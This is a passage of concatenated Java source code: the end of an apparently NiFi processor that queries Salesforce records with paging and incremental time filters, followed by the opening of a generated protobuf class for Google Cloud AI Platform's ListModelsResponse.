.expressionLanguageSupported(ExpressionLanguageScope.ENVIRONMENT) .addValidator(StandardValidators.NON_BLANK_VALIDATOR) .dependsOn(QUERY_TYPE, PROPERTY_BASED_QUERY) .build(); static final PropertyDescriptor FIELD_NAMES = new PropertyDescriptor.Builder() .name("field-names") .displayName("Field Names") .description("Comma-separated list of field names requested from the sObject to be queried. When this field is left empty, all fields are queried.") .required(false) .expressionLanguageSupported(ExpressionLanguageScope.ENVIRONMENT) .addValidator(StandardValidators.NON_BLANK_VALIDATOR) .dependsOn(QUERY_TYPE, PROPERTY_BASED_QUERY) .build(); static final PropertyDescriptor RECORD_WRITER = new PropertyDescriptor.Builder() .name("record-writer") .displayName("Record Writer") .description("Service used for writing records returned from the Salesforce REST API") .identifiesControllerService(RecordSetWriterFactory.class) .required(true) .dependsOn(QUERY_TYPE, PROPERTY_BASED_QUERY) .build(); static final PropertyDescriptor CREATE_ZERO_RECORD_FILES = new PropertyDescriptor.Builder() .name("create-zero-record-files") .displayName("Create Zero Record FlowFiles") .description("Specifies whether or not to create a FlowFile when the Salesforce REST API does not return any records") .expressionLanguageSupported(ExpressionLanguageScope.NONE) .allowableValues("true", "false") .defaultValue("false") .required(true) .dependsOn(QUERY_TYPE, PROPERTY_BASED_QUERY) .build(); public static final PropertyDescriptor AGE_FIELD = new PropertyDescriptor.Builder() .name("age-field") .displayName("Age Field") .description("The name of a TIMESTAMP field that will be used to filter records using a bounded time window." + "The processor will return only those records with a timestamp value newer than the timestamp recorded after the last processor run." ) .required(false) .expressionLanguageSupported(ExpressionLanguageScope.ENVIRONMENT) .addValidator(StandardValidators.NON_BLANK_VALIDATOR) .dependsOn(QUERY_TYPE, PROPERTY_BASED_QUERY) .build(); public static final PropertyDescriptor AGE_DELAY = new PropertyDescriptor.Builder() .name("age-delay") .displayName("Age Delay") .description("The ending timestamp of the time window will be adjusted earlier by the amount configured in this property." + " For example, with a property value of 10 seconds, an ending timestamp of 12:30:45 would be changed to 12:30:35.") .required(false) .expressionLanguageSupported(ExpressionLanguageScope.ENVIRONMENT) .addValidator(StandardValidators.TIME_PERIOD_VALIDATOR) .dependsOn(AGE_FIELD) .dependsOn(QUERY_TYPE, PROPERTY_BASED_QUERY) .build(); public static final PropertyDescriptor INITIAL_AGE_FILTER = new PropertyDescriptor.Builder() .name("initial-age-filter") .displayName("Initial Age Start Time") .description("This property specifies the start time that the processor applies when running the first query.") .required(false) .expressionLanguageSupported(ExpressionLanguageScope.ENVIRONMENT) .addValidator(StandardValidators.NON_BLANK_VALIDATOR) .dependsOn(AGE_FIELD) .dependsOn(QUERY_TYPE, PROPERTY_BASED_QUERY) .build(); static final PropertyDescriptor CUSTOM_WHERE_CONDITION = new PropertyDescriptor.Builder() .name("custom-where-condition") .displayName("Custom WHERE Condition") .description("A custom expression to be added in the WHERE clause of the query") .required(false) .expressionLanguageSupported(ExpressionLanguageScope.FLOWFILE_ATTRIBUTES) .addValidator(StandardValidators.NON_EMPTY_VALIDATOR) .dependsOn(QUERY_TYPE, PROPERTY_BASED_QUERY) .build(); static final PropertyDescriptor INCLUDE_DELETED_RECORDS = new PropertyDescriptor.Builder() .name("include-deleted-records") .displayName("Include Deleted Records") .description("If true, the processor will include deleted records (IsDeleted = true) in the query results. When enabled, the processor will use the 'queryAll' API.") .required(true) .defaultValue("false") .allowableValues("true", "false") .dependsOn(QUERY_TYPE, PROPERTY_BASED_QUERY) .build(); static final Relationship REL_SUCCESS = new Relationship.Builder() .name("success") .description("For FlowFiles created as a result of a successful query.") .build(); static final Relationship REL_ORIGINAL = new Relationship.Builder() .name("original") .description("The input flowfile gets sent to this relationship when the query succeeds.") .autoTerminateDefault(true) .build(); static final Relationship REL_FAILURE = new Relationship.Builder() .name("failure") .description("The input flowfile gets sent to this relationship when the query fails.") .autoTerminateDefault(true) .build(); public static final String LAST_AGE_FILTER = "last_age_filter"; private static final String STARTING_FIELD_NAME = "records"; private static final String DATE_FORMAT = "yyyy-MM-dd"; private static final String TIME_FORMAT = "HH:mm:ss.SSSZ"; private static final String DATE_TIME_FORMAT = "yyyy-MM-dd'T'HH:mm:ss.SSSZ"; private static final String NEXT_RECORDS_URL = "nextRecordsUrl"; private static final String TOTAL_SIZE = "totalSize"; private static final String RECORDS = "records"; private static final BiPredicate<String, String> CAPTURE_PREDICATE = (fieldName, fieldValue) -> NEXT_RECORDS_URL.equals(fieldName); private static final ObjectMapper OBJECT_MAPPER = new ObjectMapper(); private static final JsonFactory JSON_FACTORY = OBJECT_MAPPER.getFactory(); private static final String TOTAL_RECORD_COUNT_ATTRIBUTE = "total.record.count"; private static final int MAX_RECORD_COUNT = 2000; private static final JsonParserFactory jsonParserFactory = new JsonParserFactory(); private volatile SalesforceToRecordSchemaConverter salesForceToRecordSchemaConverter; private volatile SalesforceRestClient salesforceRestService; private volatile boolean resetState = false; @OnScheduled public void onScheduled(ProcessContext context) { if (resetState) { clearState(context); resetState = false; } salesForceToRecordSchemaConverter = new SalesforceToRecordSchemaConverter( DATE_FORMAT, DATE_TIME_FORMAT, TIME_FORMAT ); String salesforceVersion = context.getProperty(API_VERSION).getValue(); String instanceUrl = context.getProperty(SALESFORCE_INSTANCE_URL).getValue(); OAuth2AccessTokenProvider accessTokenProvider = context.getProperty(TOKEN_PROVIDER).asControllerService(OAuth2AccessTokenProvider.class); SalesforceConfiguration salesforceConfiguration = SalesforceConfiguration.create( instanceUrl, salesforceVersion, () -> accessTokenProvider.getAccessDetails().getAccessToken(), context.getProperty(READ_TIMEOUT).evaluateAttributeExpressions().asTimePeriod(TimeUnit.MILLISECONDS).intValue() ); salesforceRestService = new SalesforceRestClient(salesforceConfiguration); } private static final List<PropertyDescriptor> PROPERTY_DESCRIPTORS = List.of( SALESFORCE_INSTANCE_URL, API_VERSION, QUERY_TYPE, CUSTOM_SOQL_QUERY, SOBJECT_NAME, FIELD_NAMES, RECORD_WRITER, AGE_FIELD, INITIAL_AGE_FILTER, AGE_DELAY, CUSTOM_WHERE_CONDITION, INCLUDE_DELETED_RECORDS, READ_TIMEOUT, CREATE_ZERO_RECORD_FILES, TOKEN_PROVIDER ); private static final Set<Relationship> RELATIONSHIPS = Set.of( REL_SUCCESS, REL_FAILURE, REL_ORIGINAL ); @Override protected List<PropertyDescriptor> getSupportedPropertyDescriptors() { return PROPERTY_DESCRIPTORS; } @Override public Set<Relationship> getRelationships() { return RELATIONSHIPS; } @Override protected Collection<ValidationResult> customValidate(ValidationContext validationContext) { List<ValidationResult> results = new ArrayList<>(super.customValidate(validationContext)); return SalesforceAgeValidator.validate(validationContext, results); } @Override public void onPropertyModified(PropertyDescriptor descriptor, String oldValue, String newValue) { if ((oldValue != null && !oldValue.equals(newValue)) && (descriptor.equals(SALESFORCE_INSTANCE_URL) || descriptor.equals(QUERY_TYPE) || descriptor.equals(SOBJECT_NAME) || descriptor.equals(AGE_FIELD) || descriptor.equals(INITIAL_AGE_FILTER) || descriptor.equals(CUSTOM_WHERE_CONDITION) || descriptor.equals(INCLUDE_DELETED_RECORDS)) ) { getLogger().debug("A property that require resetting state was modified - {} oldValue {} newValue {}", descriptor.getDisplayName(), oldValue, newValue); resetState = true; } } @Override public void onTrigger(ProcessContext context, ProcessSession session) throws ProcessException { boolean isCustomQuery = CUSTOM_QUERY.getValue().equals(context.getProperty(QUERY_TYPE).getValue()); FlowFile flowFile = session.get(); if (isCustomQuery) { processCustomQuery(context, session, flowFile); } else { processQuery(context, session, flowFile); } } private void processQuery(ProcessContext context, ProcessSession session, FlowFile originalFlowFile) { AtomicReference<String> nextRecordsUrl = new AtomicReference<>(); String sObject = context.getProperty(SOBJECT_NAME).getValue(); String fields = context.getProperty(FIELD_NAMES).getValue(); String customWhereClause = context.getProperty(CUSTOM_WHERE_CONDITION).evaluateAttributeExpressions(originalFlowFile).getValue(); RecordSetWriterFactory writerFactory = context.getProperty(RECORD_WRITER).asControllerService(RecordSetWriterFactory.class); boolean createZeroRecordFlowFiles = context.getProperty(CREATE_ZERO_RECORD_FILES).asBoolean(); boolean includeDeletedRecords = context.getProperty(INCLUDE_DELETED_RECORDS).asBoolean(); StateMap state = getState(session); IncrementalContext incrementalContext = new IncrementalContext(context, state); SalesforceSchemaHolder salesForceSchemaHolder = getConvertedSalesforceSchema(sObject, fields, includeDeletedRecords); if (StringUtils.isBlank(fields)) { fields = salesForceSchemaHolder.getSalesforceObject().getFields() .stream() .map(SObjectField::getName) .collect(Collectors.joining(",")); } // Add IsDeleted to fields if Include Deleted Records is true if (includeDeletedRecords) { List<String> fieldList = Arrays.stream(fields.split("\\s*,\\s*")).collect(Collectors.toList()); if (fieldList.stream().noneMatch(f -> f.equalsIgnoreCase("IsDeleted"))) { fields = fields + ", IsDeleted"; } } String querySObject = new SalesforceQueryBuilder(incrementalContext) .buildQuery(sObject, fields, customWhereClause); AtomicBoolean isOriginalTransferred = new AtomicBoolean(false); List<FlowFile> outgoingFlowFiles = new ArrayList<>(); Map<String, String> originalAttributes = Optional.ofNullable(originalFlowFile) .map(FlowFile::getAttributes) .orElseGet(HashMap::new); long startNanos = System.nanoTime(); do { FlowFile outgoingFlowFile = createOutgoingFlowFile(session, originalFlowFile); outgoingFlowFiles.add(outgoingFlowFile); Map<String, String> attributes = new HashMap<>(originalAttributes); AtomicInteger recordCountHolder = new AtomicInteger(); try { outgoingFlowFile = session.write(outgoingFlowFile, processRecordsCallback(session, nextRecordsUrl, writerFactory, state, incrementalContext, salesForceSchemaHolder, querySObject, originalAttributes, attributes, recordCountHolder, includeDeletedRecords)); int recordCount = recordCountHolder.get(); if (createZeroRecordFlowFiles || recordCount != 0) { outgoingFlowFile = session.putAllAttributes(outgoingFlowFile, attributes); session.adjustCounter("Records Processed", recordCount, false); getLogger().info("Successfully written {} records for {}", recordCount, outgoingFlowFile); } else { outgoingFlowFiles.remove(outgoingFlowFile); session.remove(outgoingFlowFile); } } catch (Exception e) { if (e.getCause() instanceof IOException) { throw new ProcessException("Couldn't get Salesforce records", e); } else if (e.getCause() instanceof SchemaNotFoundException) { handleError(session, originalFlowFile, isOriginalTransferred, outgoingFlowFiles, e, "Couldn't create record writer"); } else if (e.getCause() instanceof MalformedRecordException) { handleError(session, originalFlowFile, isOriginalTransferred, outgoingFlowFiles, e, "Couldn't read records from input"); } else { handleError(session, originalFlowFile, isOriginalTransferred, outgoingFlowFiles, e, "Couldn't get Salesforce records"); } break; } } while (nextRecordsUrl.get() != null); transferFlowFiles(session, outgoingFlowFiles, originalFlowFile, isOriginalTransferred, startNanos, sObject); } private OutputStreamCallback processRecordsCallback(ProcessSession session, AtomicReference<String> nextRecordsUrl, RecordSetWriterFactory writerFactory, StateMap state, IncrementalContext incrementalContext, SalesforceSchemaHolder salesForceSchemaHolder, String querySObject, Map<String, String> originalAttributes, Map<String, String> attributes, AtomicInteger recordCountHolder, boolean includeDeletedRecords) { return out -> { try { handleRecordSet(out, nextRecordsUrl, querySObject, writerFactory, salesForceSchemaHolder, originalAttributes, attributes, recordCountHolder, includeDeletedRecords); if (incrementalContext.getAgeFilterUpper() != null) { Map<String, String> newState = new HashMap<>(state.toMap()); newState.put(LAST_AGE_FILTER, incrementalContext.getAgeFilterUpper()); updateState(session, newState); } } catch (Exception e) { throw new RuntimeException(e); } }; } private void handleRecordSet(OutputStream out, AtomicReference<String> nextRecordsUrl, String querySObject, RecordSetWriterFactory writerFactory, SalesforceSchemaHolder salesForceSchemaHolder, Map<String, String> originalAttributes, Map<String, String> attributes, AtomicInteger recordCountHolder, boolean includeDeletedRecords) throws Exception { try ( InputStream querySObjectResultInputStream = getResultInputStream(nextRecordsUrl.get(), querySObject, includeDeletedRecords); JsonTreeRowRecordReader jsonReader = createJsonReader(querySObjectResultInputStream, salesForceSchemaHolder.getRecordSchema()); RecordSetWriter writer = createRecordSetWriter(writerFactory, originalAttributes, out, salesForceSchemaHolder.getRecordSchema()) ) { writer.beginRecordSet(); Record querySObjectRecord; while ((querySObjectRecord = jsonReader.nextRecord()) != null) { writer.write(querySObjectRecord); } WriteResult writeResult = writer.finishRecordSet(); Map<String, String> capturedFields = jsonReader.getCapturedFields(); nextRecordsUrl.set(capturedFields.getOrDefault(NEXT_RECORDS_URL, null)); attributes.put("record.count", String.valueOf(writeResult.getRecordCount())); attributes.put(CoreAttributes.MIME_TYPE.key(), writer.getMimeType()); attributes.putAll(writeResult.getAttributes()); recordCountHolder.set(writeResult.getRecordCount()); } } private JsonTreeRowRecordReader createJsonReader(InputStream querySObjectResultInputStream, RecordSchema recordSchema) throws IOException, MalformedRecordException { return new JsonTreeRowRecordReader( querySObjectResultInputStream, getLogger(), recordSchema, DATE_FORMAT, TIME_FORMAT, DATE_TIME_FORMAT, StartingFieldStrategy.NESTED_FIELD, STARTING_FIELD_NAME, SchemaApplicationStrategy.SELECTED_PART, CAPTURE_PREDICATE, jsonParserFactory ); } private RecordSetWriter createRecordSetWriter(RecordSetWriterFactory writerFactory, Map<String, String> originalAttributes, OutputStream out, RecordSchema recordSchema) throws IOException, SchemaNotFoundException { return writerFactory.createWriter( getLogger(), writerFactory.getSchema( originalAttributes, recordSchema ), out, originalAttributes ); } private void processCustomQuery(ProcessContext context, ProcessSession session, FlowFile originalFlowFile) { String customQuery = context.getProperty(CUSTOM_SOQL_QUERY).evaluateAttributeExpressions(originalFlowFile).getValue(); AtomicReference<String> nextRecordsUrl = new AtomicReference<>(); AtomicReference<String> totalSize = new AtomicReference<>(); AtomicBoolean isOriginalTransferred = new AtomicBoolean(false); List<FlowFile> outgoingFlowFiles = new ArrayList<>(); long startNanos = System.nanoTime(); boolean includeDeletedRecords = context.getProperty(INCLUDE_DELETED_RECORDS).asBoolean(); do { try (InputStream response = getResultInputStream(nextRecordsUrl.get(), customQuery, includeDeletedRecords)) { FlowFile outgoingFlowFile = createOutgoingFlowFile(session, originalFlowFile); outgoingFlowFiles.add(outgoingFlowFile); outgoingFlowFile = session.write(outgoingFlowFile, parseCustomQueryResponse(response, nextRecordsUrl, totalSize)); int recordCount = nextRecordsUrl.get() != null ? MAX_RECORD_COUNT : Integer.parseInt(totalSize.get()) % MAX_RECORD_COUNT; Map<String, String> attributes = new HashMap<>(); attributes.put(CoreAttributes.MIME_TYPE.key(), "application/json"); attributes.put(TOTAL_RECORD_COUNT_ATTRIBUTE, String.valueOf(recordCount)); session.adjustCounter("Salesforce records processed", recordCount, false); outgoingFlowFile = session.putAllAttributes(outgoingFlowFile, attributes); } catch (IOException e) { throw new ProcessException("Couldn't get Salesforce records", e); } catch (Exception e) { handleError(session, originalFlowFile, isOriginalTransferred, outgoingFlowFiles, e, "Couldn't get Salesforce records"); break; } } while (nextRecordsUrl.get() != null); transferFlowFiles(session, outgoingFlowFiles, originalFlowFile, isOriginalTransferred, startNanos, "custom"); } private void transferFlowFiles(ProcessSession session, List<FlowFile> outgoingFlowFiles, FlowFile originalFlowFile, AtomicBoolean isOriginalTransferred, long startNanos, String urlDetail) { if (!outgoingFlowFiles.isEmpty()) { session.transfer(outgoingFlowFiles, REL_SUCCESS); long transferMillis = TimeUnit.NANOSECONDS.toMillis(System.nanoTime() - startNanos); outgoingFlowFiles.forEach(ff -> session.getProvenanceReporter().receive(ff, salesforceRestService.getVersionedBaseUrl() + "/" + urlDetail, transferMillis) ); } if (originalFlowFile != null && !isOriginalTransferred.get()) { session.transfer(originalFlowFile, REL_ORIGINAL); } } private FlowFile createOutgoingFlowFile(ProcessSession session, FlowFile originalFlowFile) { if (originalFlowFile != null) { return session.create(originalFlowFile); } else { return session.create(); } } private OutputStreamCallback parseCustomQueryResponse(InputStream in, AtomicReference<String> nextRecordsUrl, AtomicReference<String> totalSize) { nextRecordsUrl.set(null); return out -> { try (JsonParser jsonParser = JSON_FACTORY.createParser(in); JsonGenerator jsonGenerator = JSON_FACTORY.createGenerator(out, JsonEncoding.UTF8)) { while (jsonParser.nextToken() != null) { if (nextTokenIs(jsonParser, TOTAL_SIZE)) { totalSize.set(jsonParser.getValueAsString()); } else if (nextTokenIs(jsonParser, NEXT_RECORDS_URL)) { nextRecordsUrl.set(jsonParser.getValueAsString()); } else if (nextTokenIs(jsonParser, RECORDS)) { jsonGenerator.copyCurrentStructure(jsonParser); } } } }; } private boolean nextTokenIs(JsonParser jsonParser, String value) throws IOException { return jsonParser.getCurrentToken() == JsonToken.FIELD_NAME && jsonParser.currentName() .equals(value) && jsonParser.nextToken() != null; } private InputStream getResultInputStream(String nextRecordsUrl, String querySObject, boolean includeDeletedRecords) { if (nextRecordsUrl == null) { if (includeDeletedRecords) { return salesforceRestService.queryAll(querySObject); } else { return salesforceRestService.query(querySObject); } } return salesforceRestService.getNextRecords(nextRecordsUrl); } private SalesforceSchemaHolder getConvertedSalesforceSchema(String sObject, String fields, boolean includeDeletedRecords) { try (InputStream describeSObjectResult = salesforceRestService.describeSObject(sObject)) { return convertSchema(describeSObjectResult, fields); } catch (IOException e) { throw new UncheckedIOException("Salesforce input stream close failed", e); } } private void handleError(ProcessSession session, FlowFile originalFlowFile, AtomicBoolean isOriginalTransferred, List<FlowFile> outgoingFlowFiles, Exception e, String errorMessage) { if (originalFlowFile != null) { session.transfer(originalFlowFile, REL_FAILURE); isOriginalTransferred.set(true); } getLogger().error(errorMessage, e); session.remove(outgoingFlowFiles); outgoingFlowFiles.clear(); } private StateMap getState(ProcessSession session) { StateMap state; try { state = session.getState(Scope.CLUSTER); } catch (IOException e) { throw new ProcessException("State retrieval failed", e); } return state; } private void updateState(ProcessSession session, Map<String, String> newState) { try { session.setState(newState, Scope.CLUSTER); } catch (IOException e) { throw new ProcessException("Last Age Filter state update failed", e); } } private void clearState(ProcessContext context) { try { getLogger().debug("Clearing state based on property modifications"); context.getStateManager().clear(Scope.CLUSTER); } catch (final IOException e) { getLogger().warn("Failed to clear state", e); } } protected SalesforceSchemaHolder convertSchema(InputStream describeSObjectResult, String fieldsOfInterest) { try { SObjectDescription salesforceObject = salesForceToRecordSchemaConverter.getSalesforceObject(describeSObjectResult); RecordSchema recordSchema = salesForceToRecordSchemaConverter.convertSchema(salesforceObject, fieldsOfInterest); RecordSchema querySObjectResultSchema = new SimpleRecordSchema(Collections.singletonList( new RecordField(STARTING_FIELD_NAME, RecordFieldType.ARRAY.getArrayDataType( RecordFieldType.RECORD.getRecordDataType(recordSchema) )) )); return new SalesforceSchemaHolder(querySObjectResultSchema, recordSchema, salesforceObject); } catch (IOException e) { throw new ProcessException("SObject to Record schema conversion failed", e); } } }
googleapis/google-cloud-java
35,728
java-aiplatform/proto-google-cloud-aiplatform-v1/src/main/java/com/google/cloud/aiplatform/v1/ListModelsResponse.java
/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ // Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/cloud/aiplatform/v1/model_service.proto // Protobuf Java Version: 3.25.8 package com.google.cloud.aiplatform.v1; /** * * * <pre> * Response message for * [ModelService.ListModels][google.cloud.aiplatform.v1.ModelService.ListModels] * </pre> * * Protobuf type {@code google.cloud.aiplatform.v1.ListModelsResponse} */ public final class ListModelsResponse extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.cloud.aiplatform.v1.ListModelsResponse) ListModelsResponseOrBuilder { private static final long serialVersionUID = 0L; // Use ListModelsResponse.newBuilder() to construct. private ListModelsResponse(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private ListModelsResponse() { models_ = java.util.Collections.emptyList(); nextPageToken_ = ""; } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance(UnusedPrivateParameter unused) { return new ListModelsResponse(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.aiplatform.v1.ModelServiceProto .internal_static_google_cloud_aiplatform_v1_ListModelsResponse_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.aiplatform.v1.ModelServiceProto .internal_static_google_cloud_aiplatform_v1_ListModelsResponse_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.aiplatform.v1.ListModelsResponse.class, com.google.cloud.aiplatform.v1.ListModelsResponse.Builder.class); } public static final int MODELS_FIELD_NUMBER = 1; @SuppressWarnings("serial") private java.util.List<com.google.cloud.aiplatform.v1.Model> models_; /** * * * <pre> * List of Models in the requested page. * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Model models = 1;</code> */ @java.lang.Override public java.util.List<com.google.cloud.aiplatform.v1.Model> getModelsList() { return models_; } /** * * * <pre> * List of Models in the requested page. * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Model models = 1;</code> */ @java.lang.Override public java.util.List<? extends com.google.cloud.aiplatform.v1.ModelOrBuilder> getModelsOrBuilderList() { return models_; } /** * * * <pre> * List of Models in the requested page. * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Model models = 1;</code> */ @java.lang.Override public int getModelsCount() { return models_.size(); } /** * * * <pre> * List of Models in the requested page. * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Model models = 1;</code> */ @java.lang.Override public com.google.cloud.aiplatform.v1.Model getModels(int index) { return models_.get(index); } /** * * * <pre> * List of Models in the requested page. * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Model models = 1;</code> */ @java.lang.Override public com.google.cloud.aiplatform.v1.ModelOrBuilder getModelsOrBuilder(int index) { return models_.get(index); } public static final int NEXT_PAGE_TOKEN_FIELD_NUMBER = 2; @SuppressWarnings("serial") private volatile java.lang.Object nextPageToken_ = ""; /** * * * <pre> * A token to retrieve next page of results. * Pass to * [ListModelsRequest.page_token][google.cloud.aiplatform.v1.ListModelsRequest.page_token] * to obtain that page. * </pre> * * <code>string next_page_token = 2;</code> * * @return The nextPageToken. */ @java.lang.Override public java.lang.String getNextPageToken() { java.lang.Object ref = nextPageToken_; if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); nextPageToken_ = s; return s; } } /** * * * <pre> * A token to retrieve next page of results. * Pass to * [ListModelsRequest.page_token][google.cloud.aiplatform.v1.ListModelsRequest.page_token] * to obtain that page. * </pre> * * <code>string next_page_token = 2;</code> * * @return The bytes for nextPageToken. */ @java.lang.Override public com.google.protobuf.ByteString getNextPageTokenBytes() { java.lang.Object ref = nextPageToken_; if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); nextPageToken_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { for (int i = 0; i < models_.size(); i++) { output.writeMessage(1, models_.get(i)); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(nextPageToken_)) { com.google.protobuf.GeneratedMessageV3.writeString(output, 2, nextPageToken_); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; for (int i = 0; i < models_.size(); i++) { size += com.google.protobuf.CodedOutputStream.computeMessageSize(1, models_.get(i)); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(nextPageToken_)) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(2, nextPageToken_); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.cloud.aiplatform.v1.ListModelsResponse)) { return super.equals(obj); } com.google.cloud.aiplatform.v1.ListModelsResponse other = (com.google.cloud.aiplatform.v1.ListModelsResponse) obj; if (!getModelsList().equals(other.getModelsList())) return false; if (!getNextPageToken().equals(other.getNextPageToken())) return false; if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); if (getModelsCount() > 0) { hash = (37 * hash) + MODELS_FIELD_NUMBER; hash = (53 * hash) + getModelsList().hashCode(); } hash = (37 * hash) + NEXT_PAGE_TOKEN_FIELD_NUMBER; hash = (53 * hash) + getNextPageToken().hashCode(); hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.cloud.aiplatform.v1.ListModelsResponse parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.aiplatform.v1.ListModelsResponse parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.aiplatform.v1.ListModelsResponse parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.aiplatform.v1.ListModelsResponse parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.aiplatform.v1.ListModelsResponse parseFrom(byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.aiplatform.v1.ListModelsResponse parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.aiplatform.v1.ListModelsResponse parseFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.aiplatform.v1.ListModelsResponse parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.aiplatform.v1.ListModelsResponse parseDelimitedFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); } public static com.google.cloud.aiplatform.v1.ListModelsResponse parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.aiplatform.v1.ListModelsResponse parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.aiplatform.v1.ListModelsResponse parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder(com.google.cloud.aiplatform.v1.ListModelsResponse prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * * * <pre> * Response message for * [ModelService.ListModels][google.cloud.aiplatform.v1.ModelService.ListModels] * </pre> * * Protobuf type {@code google.cloud.aiplatform.v1.ListModelsResponse} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.cloud.aiplatform.v1.ListModelsResponse) com.google.cloud.aiplatform.v1.ListModelsResponseOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.aiplatform.v1.ModelServiceProto .internal_static_google_cloud_aiplatform_v1_ListModelsResponse_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.aiplatform.v1.ModelServiceProto .internal_static_google_cloud_aiplatform_v1_ListModelsResponse_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.aiplatform.v1.ListModelsResponse.class, com.google.cloud.aiplatform.v1.ListModelsResponse.Builder.class); } // Construct using com.google.cloud.aiplatform.v1.ListModelsResponse.newBuilder() private Builder() {} private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; if (modelsBuilder_ == null) { models_ = java.util.Collections.emptyList(); } else { models_ = null; modelsBuilder_.clear(); } bitField0_ = (bitField0_ & ~0x00000001); nextPageToken_ = ""; return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.cloud.aiplatform.v1.ModelServiceProto .internal_static_google_cloud_aiplatform_v1_ListModelsResponse_descriptor; } @java.lang.Override public com.google.cloud.aiplatform.v1.ListModelsResponse getDefaultInstanceForType() { return com.google.cloud.aiplatform.v1.ListModelsResponse.getDefaultInstance(); } @java.lang.Override public 